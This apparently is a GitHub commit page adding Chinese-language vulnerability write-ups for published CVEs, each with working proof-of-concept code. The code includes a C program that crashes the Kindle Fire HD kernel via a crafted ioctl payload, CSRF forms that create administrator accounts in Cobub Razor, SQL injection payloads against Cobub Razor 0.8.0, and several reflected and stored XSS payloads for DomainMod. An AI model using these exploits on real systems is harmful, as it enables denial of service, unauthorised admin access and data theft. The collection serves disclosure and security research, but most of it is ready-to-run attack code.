Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
Mr-xn committed Jul 24, 2019
1 parent 58f1b49 commit 0e7ad92
Show file tree
Hide file tree
Showing 29 changed files with 1,015 additions and 1 deletion.
Original file line number Diff line number Diff line change
@@ -0,0 +1,230 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞|2018-10-10|大兵|[http://www.amazon.com/](http://www.amazon.com/) | [下载连接](https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2) |Fire OS 4.5.5.3| [CVE-2018-11021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021)|

#### 漏洞概述

> Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。

### POC实现代码如下:

> exp代码如下:
``` c
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
* Related buggy struct name is dsscomp_setup_dispc_data.
* This Poc should run with permission to do ioctl on /dev/dsscomp.
*
* The fowllwing is kmsg of kernel crash infomation:
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517;

int main(int argc, char **argv, char **env) {
unsigned int payload[] = {
0xffffffff,
0x00000003,
0x5d200040,
0x79900008,
0x8f5928bd,
0x78b02422,
0x00000000,
0xffffffff,
0xf4c50400,
0x007fffff,
0x8499f562,
0xffff0400,
0x001b131d,
0x60818210,
0x00000007,
0xffffffff,
0x00000000,
0x9da9041c,
0xcd980400,
0x001f03f4,
0x00000007,
0x2a34003f,
0x7c80d8f3,
0x63102627,
0xc73643a8,
0xa28f0665,
0x00000000,
0x689e57b4,
0x01ff0008,
0x5e7324b1,
0xae3b003f,
0x0b174d86,
0x00000400,
0x21ffff37,
0xceb367a4,
0x00000040,
0x00000001,
0xec000f9e,
0x00000001,
0x000001ff,
0x00000000,
0x00000000,
0x0000000f,
0x0425c069,
0x038cc3be,
0x0000000f,
0x00000080,
0xe5790100,
0x5b1bffff,
0x0000d355,
0x0000c685,
0xa0070000,
0x0010ffff,
0x00a0ff00,
0x00000001,
0xff490700,
0x0832ad03,
0x00000006,
0x00000002,
0x00000001,
0x81f871c0,
0x738019cb,
0xbf47ffff,
0x00000040,
0x00000001,
0x7f190f33,
0x00000001,
0x8295769b,
0x0000003f,
0x869f2295,
0xffffffff,
0xd673914f,
0x05055800,
0xed69b7d5,
0x00000000,
0x0107ebbd,
0xd214af8d,
0xffff4a93,
0x26450008,
0x58df0000,
0xd16db084,
0x03ff30dd,
0x00000001,
0x209aff3b,
0xe7850800,
0x00000002,
0x30da815c,
0x426f5105,
0x0de109d7,
0x2c1a65fc,
0xfcb3d75f,
0x00000000,
0x00000001,
0x8066be5b,
0x00000002,
0xffffffff,
0x5cf232ec,
0x680d1469,
0x00000001,
0x00000020,
0xffffffff,
0x00000400,
0xd1d12be8,
0x02010200,
0x01ffc16f,
0xf6e237e6,
0x007f0000,
0x01ff08f8,
0x000f00f9,
0xbad07695,
0x00000000,
0xbaff0000,
0x24040040,
0x00000006,
0x00000004,
0x00000000,
0xbc2e9242,
0x009f5f08,
0x00800000,
0x00000000,
0x00000001,
0xff8800ff,
0x00000001,
0x00000000,
0x000003f4,
0x6faa8472,
0x00000400,
0xec857dd5,
0x00000000,
0x00000040,
0xffffffff,
0x3f004874,
0x0000b77a,
0xec9acb95,
0xfacc0001,
0xffff0001,
0x0080ffff,
0x3600ff03,
0x00000001,
0x8fff7d7f,
0x6b87075a,
0x00000000,
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x001001ff,
0x00000000,
0x00000001,
0xff1f0512,
0x00000001,
0x51e32167,
0xc18c55cc,
0x00000000,
0xffffffff,
0xb4aaf12b,
0x86edfdbd,
0x00000010,
0x0000003f,
0xabff7b00,
0xffff9ea3,
0xb28e0040,
0x000fffff,
0x458603f4,
0xffff007f,
0xa9030f02,
0x00000001,
0x002cffff,
0x9e00cdff,
0x00000004,
0x41414141,
0x41414141,
0x41414141,
0x41414141 };

int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}
printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}
```
28 changes: 28 additions & 0 deletions Cobub Razor 0.7.2存在跨站请求伪造漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.7.2存在跨站请求伪造漏洞|2018-03-06|Kyhvedn([email protected][email protected]|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.7.2 | [CVE-2018-7720](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720)|

#### 漏洞概述

> Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。
### POC实现代码如下:

> 利用代码如下:
``` html
<body>
<script>alert(document.cookie)</script>
<form action="http://localhost/index.php?/user/createNewUser/" method="POST">
<input type="hidden" name="username" value="test123" />
<input type="hidden" name="email" value="test&#64;test123&#46;test" />
<input type="hidden" name="password" value="test" />
<input type="hidden" name="confirm&#95;password" value="test" />
<input type="hidden" name="userrole" value="3" />
<input type="hidden" name="user&#47;ccreateNewUser" value="&#136;&#155;&#187;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
29 changes: 29 additions & 0 deletions Cobub Razor 0.7.2越权增加管理员账户.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.7.2越权增加管理员账户|2018-04-09|ppb([email protected]|[https://github.com/cobub/razor/](https://github.com/cobub/razor/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.72| [CVE-2018-7745](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745)|

#### 漏洞概述

> Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/161)告知作者。

### POC实现代码如下:

> 利用代码如下:
``` html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
<input type="hidden" name="siteurl" value="http://127.0.0.1/" />
<input type="hidden" name="superuser" value="test" />
<input type="hidden" name="pwd" value="test123" />
<input type="hidden" name="verifypassword" value="test123" />
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
18 changes: 18 additions & 0 deletions Cobub Razor 0.8.0存在SQL注入漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.8.0存在SQL注入漏洞|2018-04-16|Kyhvedn([email protected][email protected]|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.8.0| [CVE-2018-8057](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057)|

#### 漏洞概述

> Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。

### POC实现代码如下:

> http://localhost/index.php?/manage/channel/addchannel
> POST data:
> 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
> 2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
40 changes: 40 additions & 0 deletions Cobub Razor 0.8.0存在物理路径泄露漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.8.0存在物理路径泄露漏洞|2018-04-20|Kyhvedn([email protected][email protected]|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) | 0.8.0| [CVE-2018-8056](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056)/[CVE-2018-8770](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770)|

#### 漏洞概述

> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。
### POC实现代码如下:

> 方法一:
``` raw
URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1
```
> 方法二:
> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。
``` raw
HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php
```
39 changes: 39 additions & 0 deletions DomainMod的XSS集合.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|DomainMod的XSS|2018-05-24|longer/套哥([email protected]|[https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) | [https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) |4.09.03/4.10.0| [CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11404](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404)/[CVE-2018-11558](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558)/[CVE-2018-11559](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559)|

#### 漏洞概述

> DomainMod v4.09.03版本和v4.10.0版本 存在XSS的页面

### POC实现代码如下:

> DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。
>CSRF测试页面代码如下:
``` html
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
```
> DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。
>CSRF测试页面代码如下:
``` html
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
```
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:
``` raw
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
```
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:
``` raw
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
```
Loading

0 comments on commit 0e7ad92

Please sign in to comment.